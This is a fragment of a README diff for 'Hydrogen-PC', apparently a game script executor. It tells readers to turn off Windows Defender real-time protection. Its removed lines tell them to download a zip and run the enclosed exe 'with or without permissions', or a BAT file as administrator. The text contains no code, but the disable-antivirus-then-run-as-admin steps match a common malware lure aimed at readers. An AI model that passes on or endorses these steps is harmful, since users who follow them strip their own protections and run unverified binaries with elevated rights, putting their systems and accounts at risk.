Encode-Hub/Hydrogen-PC/README.md

 2. Navigate to "Virus & threat protection."
 3. Click on "Manage settings."
 4. Disable "Real-time protection."

-### DOWNLOADING
-1. Download the zip file in release packages.
-2. unzip the file and go to builder files.

-### RUNNING
-1. after going to the builder file, you will see a debugger BAT file and exe file.
-2. Right click and run the exe file with or without permissions.
-3. (optional) if exe isn't running properly, run the bat file in administrator.

 ## HELP SUPPORT🎟️
 IF file not working then create an issue ticket and inform us so we can make sure that the executor is working properly.